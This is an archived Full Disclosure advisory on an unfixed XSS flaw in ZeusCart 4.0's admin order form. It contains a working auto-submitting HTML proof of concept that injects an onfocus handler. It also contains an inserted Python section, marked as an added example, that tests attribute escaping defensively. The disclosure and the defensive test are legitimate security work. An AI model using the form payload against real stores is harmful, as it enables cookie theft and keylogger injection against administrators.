Full Disclosure mailing list archives

ZeusCart 4.0 - XSS - not fixed


From: "Curesec Research Team (CRT)" <crt () curesec com>
Date: Mon, 14 Sep 2015 18:18:26 +0200

ZeusCart 4.0: XSS
Security Advisory – Curesec Research Team
1. Introduction

Affected Product:       ZeusCart 4.0
Fixed in:               not fixed
Fixed Version Link:     n/a
Vendor Contact:         support () zeuscart com
Vulnerability Type:     XSS
Remote Exploitable:     Yes
Reported to vendor:     08/13/2015
Disclosed to public:    09/14/2015
Release mode:           Full Disclosure
CVE:                    n/a
Credits:                Tim Coen of Curesec GmbH

2. Vulnerability Description

There is an XSS vulnerability via the "txtstreet" POST parameter when
adding a new order. With this, it is possible to steal cookies or inject
JavaScript keyloggers.

3. Proof of Concept


        <form name="myform" method="post"
            action="http://localhost/zeuscart-master/admin/index.php?do=addUserOrder&action=create">

            <input type="hidden" name="hidOrderTotal" value="400">
            <input type="hidden" name="discount" value="flat">
            <input type="hidden" name="selCustomer" value="1">
            <input type="hidden" name="payOption" value="8">
            <input type="hidden" name="txtname" value="Primary">
            <input type="hidden" name="txtstreet" value="foo autofocus
onfocus=alert(1); bar">
        </form>
        <script>document.myform.submit();</script>
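
The proof of concept above needs neither quotes nor angle brackets, only spaces, which is the signature of a value reflected into an unquoted HTML attribute. The Python script below is an added example, not code from the advisory or from ZeusCart: the three render functions are hypothetical stand-ins for a server-side template (ZeusCart's real code is not shown here), the `QUOTE_BREAKOUT` payload is constructed, and the attribute check uses the standard-library HTML tokenizer to count how many attributes the rendered `<input>` ends up with. A rendering is contained when the user value stays inside the `value` attribute and no other attribute appears.

```python
import html
from html.parser import HTMLParser

# Payload from the advisory's proof of concept (the "txtstreet" value). It
# contains no quotes or angle brackets: spaces are enough when the value
# lands in an unquoted attribute.
POC_TXTSTREET = "foo autofocus onfocus=alert(1); bar"

# Constructed second payload, used to show that quoting alone is not enough.
QUOTE_BREAKOUT = '" onfocus="alert(1)'


def render_unquoted(street: str) -> str:
    """Hypothetical vulnerable pattern (not ZeusCart's code): the submitted
    value is interpolated into an unquoted attribute without encoding."""
    return f"<input type=text name=txtstreet value={street}>"


def render_quoted_unescaped(street: str) -> str:
    """Hypothetical half-fix: quoted attribute, but still no encoding."""
    return f'<input type="text" name="txtstreet" value="{street}">'


def render_quoted_escaped(street: str) -> str:
    """Hardened pattern: quote the attribute and HTML-encode the value,
    including quote characters (PHP equivalent: htmlspecialchars($v, ENT_QUOTES))."""
    return f'<input type="text" name="txtstreet" value="{html.escape(street, quote=True)}">'


class _InputAttrs(HTMLParser):
    """Collects the attributes of the first <input> tag in a fragment, the way
    a browser tokenizes it (attribute values come back entity-decoded)."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs: dict = {}
        self._done = False

    def handle_starttag(self, tag, attrs):
        if tag == "input" and not self._done:
            self.attrs = dict(attrs)
            self._done = True


def input_attributes(fragment: str) -> dict:
    parser = _InputAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.attrs


def injected_attributes(fragment: str, expected=("type", "name", "value")) -> set:
    """Attribute names present on the <input> beyond the ones the template
    intended; a non-empty result means the user value escaped its context."""
    return set(input_attributes(fragment)) - set(expected)


if __name__ == "__main__":
    renderers = (("unquoted", render_unquoted),
                 ("quoted, unescaped", render_quoted_unescaped),
                 ("quoted + escaped", render_quoted_escaped))
    for name, render in renderers:
        for payload in (POC_TXTSTREET, QUOTE_BREAKOUT):
            extra = injected_attributes(render(payload))
            verdict = "INJECTED " + ",".join(sorted(extra)) if extra else "contained"
            print(f"{name:18} {payload!r:38} {verdict}")
```

Running it shows the advisory's payload turning into `autofocus`, `onfocus` and `bar` attributes under the unquoted renderer, staying contained once the attribute is quoted, and the second payload breaking out of the quoted-but-unescaped variant; only quoting plus `ENT_QUOTES`-style encoding holds for both. The same `injected_attributes` check can be kept as a regression test around whichever template emits the order form.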

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

08/13/2015      Informed Vendor about Issue (no reply)
09/07/2015      Reminded Vendor of release date (no reply)
09/14/2015      Disclosed to public

6. Blog Reference:
http://blog.curesec.com/article/blog/ZeusCart-40-XSS-55.html

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/